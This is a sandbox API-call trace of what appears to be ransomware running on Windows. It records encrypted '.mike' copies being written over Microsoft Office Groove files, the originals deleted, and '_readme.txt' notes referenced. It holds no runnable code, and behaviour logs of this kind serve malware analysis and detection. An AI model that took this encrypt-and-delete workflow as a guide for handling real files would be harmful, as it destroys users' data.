GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.075] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.075] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.076] CoTaskMemFree (pv=0x506980) [0077.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.076] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.076] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.076] CoTaskMemFree (pv=0x506980) [0077.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.077] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.077] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.077] CoTaskMemFree (pv=0x506980) [0077.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.078] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.078] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.078] CoTaskMemFree (pv=0x506980) [0077.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.079] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.079] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.079] CoTaskMemFree (pv=0x506980) [0077.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.080] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.080] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.080] CoTaskMemFree (pv=0x506980) [0077.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.080] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.080] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.080] CoTaskMemFree (pv=0x506980) [0077.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.087] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\AddToViewArrow.jpg", dwFileAttributes=0x80) returned 1 [0077.091] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\addtoviewarrow.jpg")) returned 1 [0077.095] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html", dwFileAttributes=0x80) returned 1 [0077.100] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsblankpage.html")) returned 1 [0077.102] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBrowserUpgrade.html", dwFileAttributes=0x80) returned 1 [0077.106] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsbrowserupgrade.html")) returned 1 [0077.109] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.114] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsColorChart.html", dwFileAttributes=0x80) returned 1 [0077.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formscolorchart.html")) returned 1 [0077.116] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsFormTemplate.html", dwFileAttributes=0x80) returned 1 [0077.121] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsformtemplate.html")) returned 1 [0077.123] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.127] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePage.html", dwFileAttributes=0x80) returned 1 [0077.127] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepage.html")) returned 1 [0077.131] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.135] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html", dwFileAttributes=0x80) returned 1 [0077.135] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsimagetemplate.html")) returned 1 [0077.138] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html", dwFileAttributes=0x80) returned 1 [0077.142] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsmacrotemplate.html")) returned 1 [0077.144] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html", dwFileAttributes=0x80) returned 1 [0077.150] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formspreviewtemplate.html")) returned 1 [0077.155] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html", dwFileAttributes=0x80) returned 1 [0077.159] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsprinttemplate.html")) returned 1 [0077.162] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.166] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsVersion1Warning.htm", dwFileAttributes=0x80) returned 1 [0077.166] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsVersion1Warning.htm" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsversion1warning.htm")) returned 1 [0077.168] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewAttachmentIcons.jpg", dwFileAttributes=0x80) returned 1 [0077.173] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewattachmenticons.jpg")) returned 1 [0077.175] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewFrame.html", dwFileAttributes=0x80) returned 1 [0077.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewframe.html")) returned 1 [0077.182] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewTemplate.html", dwFileAttributes=0x80) returned 1 [0077.188] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsViewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsviewtemplate.html")) returned 1 [0077.191] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.192] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg", lpFilePart=0x0) returned 0x65 [0077.196] WriteFile (in: hFile=0x288, lpBuffer=0x223081c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x223081c*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.196] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg.mike", lpFilePart=0x0) returned 0x6a [0077.196] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg.mike", lpFilePart=0x0) returned 0x6a [0077.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg", dwFileAttributes=0x80) returned 1 [0077.197] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formtoolimages.jpg")) returned 1 [0077.198] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.200] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.200] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg.mike", lpFilePart=0x0) returned 0x6d [0077.201] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg", lpFilePart=0x0) returned 0x68 [0077.204] WriteFile (in: hFile=0x288, lpBuffer=0x2277628*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2277628*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0077.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg.mike", lpFilePart=0x0) returned 0x6d [0077.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aebfc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg.mike", lpFilePart=0x0) returned 0x6d [0077.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg", dwFileAttributes=0x80) returned 1 [0077.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\viewheaderpreview.jpg")) returned 1 [0077.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\_readme.txt", lpFilePart=0x0) returned 0x5e [0077.208] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.208] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.208] CoTaskMemFree (pv=0x506980) [0077.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles", lpFilePart=0x0) returned 0x5e [0077.214] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.214] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.214] CoTaskMemFree (pv=0x506980) [0077.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana", lpFilePart=0x0) returned 0x68 [0077.216] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.216] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.216] CoTaskMemFree (pv=0x506980) [0077.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue", lpFilePart=0x0) returned 0x67 [0077.217] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.217] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.217] CoTaskMemFree (pv=0x506980) [0077.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.217] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay", lpFilePart=0x0) returned 0x65 [0077.218] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.218] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.218] CoTaskMemFree (pv=0x506980) [0077.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.219] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange", lpFilePart=0x0) returned 0x6b [0077.220] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.220] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.220] CoTaskMemFree (pv=0x506980) [0077.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.220] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow", lpFilePart=0x0) returned 0x6b [0077.222] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.222] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.222] CoTaskMemFree (pv=0x506980) [0077.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.222] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert", lpFilePart=0x0) returned 0x65 [0077.224] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.224] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.224] CoTaskMemFree (pv=0x506980) [0077.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.224] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck", lpFilePart=0x0) returned 0x68 [0077.225] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.225] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.225] CoTaskMemFree (pv=0x506980) [0077.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.226] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime", nBufferLength=0x105, 